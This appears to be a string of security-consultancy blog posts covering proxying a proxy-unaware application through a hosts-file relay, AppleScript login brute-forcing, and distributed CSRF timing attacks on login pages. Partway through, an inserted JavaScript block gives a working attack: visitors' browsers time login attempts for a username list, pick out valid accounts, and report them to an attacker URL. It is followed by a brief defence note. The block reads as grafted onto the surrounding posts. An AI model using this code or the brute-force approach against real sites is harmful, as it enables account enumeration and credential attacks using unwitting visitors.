So - here's the scenario.
Lohan is busy testing an application that talks to remote web services on a server called (for example) www.target.com. The program ignores all proxy settings, which makes it impossible to trap and mangle its requests in the usual way.
So, we do the following:
1 - Note the IP address of www.target.com before touching anything (for this writeup we'll pretend it is 196.310.150.126, which is obviously not a real address). This has to happen first, because once the hosts entry below is in place the name will resolve to 127.0.0.1.
2 - Add an entry to the hosts file mapping www.target.com to 127.0.0.1.
3 - Fire up a quick C# app written by yours truly which listens on 127.0.0.1:80.
4 - Fire up a proxy server.
5 - Configure the C# app to use the proxy server at 127.0.0.1:<port of proxy>.
Now, the C# app does the following:
1 - Accepts the HTTP request the application believes it is sending to www.target.com.
2 - Mangles the request line into proxy (absolute-URI) form, using the IP noted in step 1 rather than the hostname (ie: "GET / HTTP/1.0" becomes "GET http://196.310.150.126/ HTTP/1.0"). The IP matters: if the proxy had to resolve www.target.com itself it would hit the same hosts entry and land straight back on our listener. The Host header is left alone, so the server still sees www.target.com.
3 - Writes the rewritten request to the proxy server.
4 - Writes the proxy's response back to the application, unchanged.
So we can now intercept, fuzz and mangle all the requests and responses between the application and the web service. This works as described for plain HTTP; an HTTPS service would need the listener to terminate TLS with a certificate the application trusts. Not really rocket science, but rather handy...
The screenshot shows something similar, but with a web browser in place of the application. I am using Paros in this example because I am still doing large chunks of work on Suru...
A long time ago I blogged on the joys of using VBS to automate brute-forcing [1|2] when one didn't want to mess about duplicating an application's functionality at the protocol level. Yesterday I needed to brute-force a web application which tried hard to be difficult and annoying, so I took the same approach, this time with AppleScript.
This was quick and dirty; with more time I would have read the results and only screenshotted the attempts that didn't come back with "your credentials are invalid". Ah well, for another day.
*** A word of warning: AppleScript is described as "an English-like language used to create script files that control the actions of the computer and the applications that run on it." This English-like-ness makes it extremely obtuse at times.
In a subsequent version of the brute force I wanted to use each username from my list with that user's first name as the password. This is an obvious call for a hash/dictionary/associative array. The sparse documentation I could find on AppleScript records didn't help me a jot (though this could just be poor Google skills).
Instead I saved each username and password as a single ":"-delimited string, split the string at runtime and submitted as before. Ugly, but effective.
Rob had a rant on his site about the timing attack, with a CSRF twist. We met him after our Vegas talk, but I'm not really sure how his attack differs from our published one.
My on-list response:
-snip- From: haroon meer
To: email@example.com Cc: firstname.lastname@example.org Subject: Re: [WEB SECURITY] Performing Distributed Brute Forcing of CSRF vulnerable login pages
Thanks for the kind words on the talk. If you check out the Visio at: http://www.sensepost.com/blogstatic/2007/08/dxsrt.png you will see that it's pretty much the same attack. In a shameless display of self-pimpage, check out the paper http://www.sensepost.com/research/squeeza/dc-15-meer_and_slaviero-WP.pdf from page 12. Figure 23, for example, shows the results in a victim/zombie's browser after he has visited our page. Effectively he tries the userlist we send him (in this case on a standard SquirrelMail login page). Once he detects a timing diff (again using a trivial algorithm to avoid latency disparity) he simply makes another request to the attacker to report his success.
We do give the important pieces of the script in the paper, but I suspect anyone with 2 minutes of time could have cobbled them together anyway.
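As an added example (not the paper's script and not the post's code), here is the victim-side loop the mail describes, in modern browser JavaScript: time a login attempt per username, decide from the timings which names exist, and report back. The login URL, form field names, report URL and the 2x threshold are assumptions; the decision logic is a plain function so it can be run offline on constructed timings.

```javascript
// Added example, not the paper's or the post's script: the measure/decide/report
// loop from the mail, with the timing decision kept pure so it can be tested.

// Median rather than mean so a single slow sample (jitter on the victim's link)
// does not flip a verdict.
function median(xs) {
  const s = [...xs].sort((a, b) => a - b);
  const mid = s.length >> 1;
  return s.length % 2 ? s[mid] : (s[mid - 1] + s[mid]) / 2;
}

// Names whose median response time is at least minRatio times the baseline.
// The baseline is a name that cannot exist, measured from the same browser, so the
// threshold adapts to whatever latency the victim happens to have (the "trivial
// algorithm to avoid latency disparity" in the mail). minRatio = 2 is an assumption.
function classify(samples, baselineName, minRatio = 2) {
  const base = median(samples[baselineName]);
  return Object.keys(samples).filter(
    (n) => n !== baselineName && median(samples[n]) >= base * minRatio
  );
}

// Browser side: time one cross-origin login attempt. mode "no-cors" means we never
// read the response, only how long it took, which is all a CSRF-style request gives us.
// Field names below are placeholders for whatever the target's login form uses.
async function timeLogin(loginUrl, user, password) {
  const body = new URLSearchParams({ login_username: user, secretkey: password });
  const t0 = performance.now();
  await fetch(loginUrl, { method: "POST", mode: "no-cors", credentials: "omit", body });
  return performance.now() - t0;
}

// Try every name in the list the attacker sent, then report hits with an image
// request (which also needs no CORS permission). loginUrl/reportUrl are assumptions.
async function run(loginUrl, reportUrl, names, rounds = 3) {
  const samples = {};
  const baseline = "zz-no-such-user-" + Math.random().toString(36).slice(2);
  for (const n of [baseline, ...names]) {
    samples[n] = [];
    for (let i = 0; i < rounds; i++) samples[n].push(await timeLogin(loginUrl, n, "x"));
  }
  const hits = classify(samples, baseline);
  new Image().src = reportUrl + "?hits=" + encodeURIComponent(hits.join(","));
  return hits;
}

// Constructed timings (milliseconds) standing in for real measurements: one name
// takes noticeably longer because the server actually checks its password.
const SAMPLE_TIMINGS = {
  "zz-no-such-user-abc": [100, 110, 105],
  alice: [410, 395, 900],
  bob: [120, 98, 104],
};

function demo() {
  return classify(SAMPLE_TIMINGS, "zz-no-such-user-abc"); // ["alice"]
}
```

The defence is the same one the paper points at: make the failure path take the same time whether or not the username exists (hash a dummy password when the user is unknown), and put a CSRF token or same-origin check on the login form so a third-party page cannot drive it in the first place.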
The Symantec Security blog has an article titled "Botnets: not just for spamming anymore". Interestingly, we are now starting to see botnets used for more than simple spamming (or simple DoS attacks).
It's pretty cool (in a twisted sort of way), because this is one of those things we called out a long time ago, predicting that botnets were way under-used as a form of cheap distributed computing. We have been mentioning their potential for effectively cutting down the key-space of session IDs, and it looks like it's starting to rear its head.
It's one of those combination "I expected this a long time ago" && "oh #$@#, let's hope it doesn't catch on" moments.
OK, so I'm in my room finally catching up on sleep (or will be in a few minutes) while most people are finishing Microsoft's booze at the PURE Microsoft party. BlackHat is over, which means tomorrow we are off to the Riviera for DefCon.
Most of the SensePost'ers have been making notes so they can blog on the talks they attended; this will filter through in the next few days. I caught the Erratasec talk this morning and have a few thoughts, but I'll wait until I have time to comment properly.
Last night we found a patch of parking lot for the first SensePost vs. BlackHat crew (.za vs USA?) soccer/football game. We started off being kicked out of the Palace Ballroom and ended up on a patch of ground outside, but it turned out to be awesome. Ultimately Bradley, Charl, Marco, Nick and I took on Grifter, DedHed, Joe Grand, Dave and Chris(?) while j0hnny long was official photographer.
It was all-round awesomeness and probably the most fun I personally have had in Vegas in a while.
We promised to upload one of the tools we demo'd during the talk, so I'll do that in a few minutes.